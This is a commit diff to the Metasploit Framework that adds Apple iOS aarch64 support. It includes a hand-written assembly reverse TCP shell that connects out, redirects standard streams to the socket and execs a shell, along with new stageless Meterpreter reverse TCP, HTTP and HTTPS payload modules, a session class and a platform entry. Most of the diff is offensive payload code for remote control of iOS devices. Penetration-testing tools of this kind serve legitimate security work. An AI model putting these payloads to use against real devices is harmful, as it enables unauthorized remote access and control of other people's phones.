Land rapid7#9296, add iOS meterpreter support

Author: busterb

Gemfile.lock

@@ -19,7 +19,7 @@ PATH
       metasploit-model
       metasploit-payloads (= 1.3.20)
       metasploit_data_models
-      metasploit_payloads-mettle (= 0.3.2)
+      metasploit_payloads-mettle (= 0.3.3)
       msgpack
       nessus_rest
       net-ssh
@@ -188,7 +188,7 @@ GEM
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.3.2)
+    metasploit_payloads-mettle (0.3.3)
     method_source (0.9.0)
     mini_portile2 (2.3.0)
     minitest (5.10.3)

external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s

@@ -0,0 +1,72 @@
+.equ SYS_SOCKET, 0x61
+.equ SYS_CONNECT, 0x62
+.equ SYS_DUP2, 0x5a
+.equ SYS_EXECVE, 0x3b
+.equ SYS_EXIT, 0x01
+
+.equ AF_INET, 0x2
+.equ SOCK_STREAM, 0x1
+
+.equ STDIN, 0x0
+.equ STDOUT, 0x1
+.equ STDERR, 0x2
+
+.equ IP, 0x0100007f
+.equ PORT, 0x5C11
+
+_start:
+        // sockfd = socket(AF_INET, SOCK_STREAM, 0)
+        mov    x0, AF_INET
+        mov    x1, SOCK_STREAM
+        mov    x2, 0
+        mov    x16, SYS_SOCKET
+        svc    0
+        mov    x3, x0
+
+        // connect(sockfd, (struct sockaddr *)&server, sockaddr_len)
+        adr    x1, sockaddr
+        mov    x2, 0x10
+        mov    x16, SYS_CONNECT
+        svc    0
+        cbnz   w0, exit
+
+        // dup2(sockfd, STDIN) ...
+        mov    x0, x3
+        mov    x2, 0
+        mov    x1, STDIN
+        mov    x16, SYS_DUP2
+        svc    0
+        mov    x1, STDOUT
+        mov    x16, SYS_DUP2
+        svc    0
+        mov    x1, STDERR
+        mov    x16, SYS_DUP2
+        svc    0
+
+        // execve('/system/bin/sh', NULL, NULL)
+        adr    x0, shell
+        mov    x2, 0
+        str    x0, [sp, 0]
+        str    x2, [sp, 8]
+        mov    x1, sp
+        mov    x16, SYS_EXECVE
+        svc    0
+
+exit:
+        mov    x0, 0
+        mov    x16, SYS_EXIT
+        svc    0
+
+.balign 4
+sockaddr:
+        .short AF_INET
+        .short PORT
+        .word  IP
+
+shell:
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000
+end:
+

lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb

@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_aarch64_Apple_iOS < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'apple_ios'
+    self.base_arch = ARCH_AARCH64
+  end
+end
+
+end
+end
+

lib/msf/core/module/platform.rb

@@ -560,4 +560,12 @@ class Hardware < Msf::Module::Platform
     Alias = "hardware"
   end
 
+  #
+  # Apple iOS
+  #
+  class Apple_iOS < Msf::Module::Platform
+    Rank = 100
+    Alias = "apple_ios"
+  end
+
 end

lib/msf/core/payload/uuid.rb

@@ -72,7 +72,8 @@ class Msf::Payload::UUID
     21 => 'python',
     22 => 'nodejs',
     23 => 'firefox',
-    24 => 'r'
+    24 => 'r',
+    25 => 'apple_ios',
   }
 
   # The raw length of the UUID structure

metasploit-framework.gemspec

@@ -72,7 +72,7 @@ Gem::Specification.new do |spec|
   # Needed for Meterpreter
   spec.add_runtime_dependency 'metasploit-payloads', '1.3.20'
   # Needed for the next-generation POSIX Meterpreter
-  spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.2'
+  spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.3'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # get list of network interfaces, like eth* from OS.

modules/exploits/multi/handler.rb

@@ -30,7 +30,7 @@ def initialize(info = {})
             'BadChars'    => '',
             'DisableNops' => true
           },
-        'Platform'       => %w[android bsd java js linux osx nodejs php python ruby solaris unix win mainframe multi],
+        'Platform'       => %w[android apple_ios bsd java js linux osx nodejs php python ruby solaris unix win mainframe multi],
         'Arch'           => ARCH_ALL,
         'Targets'        => [ [ 'Wildcard Target', {} ] ],
         'DefaultTarget'  => 0,

modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb

@@ -0,0 +1,46 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
+
+module MetasploitModule
+
+  CachedSize = 692552
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Apple_iOS Meterpreter, Reverse HTTP Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>',
+          'timwr'
+        ],
+        'Platform'      => 'apple_ios',
+        'Arch'          => ARCH_AARCH64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseHttp,
+        'Session'       => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
+      )
+    )
+  end
+
+  def generate
+    opts = {
+      scheme: 'http',
+      stageless: true
+    }
+    MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
+  end
+end

modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb

@@ -0,0 +1,46 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_https'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
+
+module MetasploitModule
+
+  CachedSize = 692552
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Apple_iOS Meterpreter, Reverse HTTPS Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>',
+          'timwr'
+        ],
+        'Platform'      => 'apple_ios',
+        'Arch'          => ARCH_AARCH64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseHttps,
+        'Session'       => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
+      )
+    )
+  end
+
+  def generate
+    opts = {
+      scheme: 'https',
+      stageless: true
+    }
+    MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
+  end
+end

modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb

@@ -0,0 +1,46 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
+
+module MetasploitModule
+
+  CachedSize = 692552
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Apple_iOS Meterpreter, Reverse TCP Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>',
+          'timwr'
+        ],
+        'Platform'      => 'apple_ios',
+        'Arch'          => ARCH_AARCH64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
+      )
+    )
+  end
+
+  def generate
+    opts = {
+      scheme: 'tcp',
+      stageless: true
+    }
+    MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
+  end
+end